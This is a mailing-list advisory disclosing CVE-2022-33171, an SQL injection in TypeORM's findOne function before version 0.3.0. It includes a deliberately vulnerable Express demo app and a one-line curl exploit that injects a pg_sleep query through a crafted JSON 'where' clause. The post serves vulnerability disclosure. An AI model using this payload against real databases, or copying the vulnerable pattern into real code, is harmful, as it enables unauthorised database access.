lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 28 Jun 2022 17:22:11 +0000
From: lixts via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] typeorm CVE-2022-33171

typeorm CVE-2022-33171

findOne(id), findOneOrFail(id)

The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection.

The issue was already fixed from version 0.3.0 onward when we encountered it.

Maintainer does not consider this a vulnerability and stated the root cause is bad input validation.

On one hand input validation is definitely insufficient. On the other hand this is a function argument that is meant to be fed user input and as such one would think it safe to put user input there.

Vulnerable app:
```

import {
  Entity,
  PrimaryGeneratedColumn,
  Connection,
  ConnectionOptions,
  Repository,
  createConnection
} from 'typeorm';
import * as express from 'express';
import {Application, Request, Response} from 'express';

let connection: Connection;

async function myListener(request: Request, response: Response) {
  if(!connection)
    connection = await createConnection(connectionOpts);
  const userRepo: Repository<User> = connection.getRepository(User);

  const ids: string[] = request.body;
  for(const id of ids) {
    try {
      await userRepo.findOne(id);
    } catch(err: any) {
      console.log(err);
    }
  }
  response.json({});
}

@Entity({ name: 'user' })
class User {
    @PrimaryGeneratedColumn('uuid')
    id: string;
}

const connectionOpts: ConnectionOptions = {
  type: 'postgres',
  name: 'myconnection',
  host: 'db-host',
  port: 5432,
  username: 'username',
  password: 'password',
  database: 'mydb',
  schema: 'public',
  entities: [User]
}

const app: Application = express();
app.use(express.json());
app.post( "/findByIds", myListener);
app.listen(4444, () => console.log('App started'));

```

Exploit:
curl -v [http://host/findByIds](http://containerip:4444/findByIds)' -H 'Content-Type: application/json' --data '[{"where":"1=1; SELECT pg_sleep(10) --"}]'
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists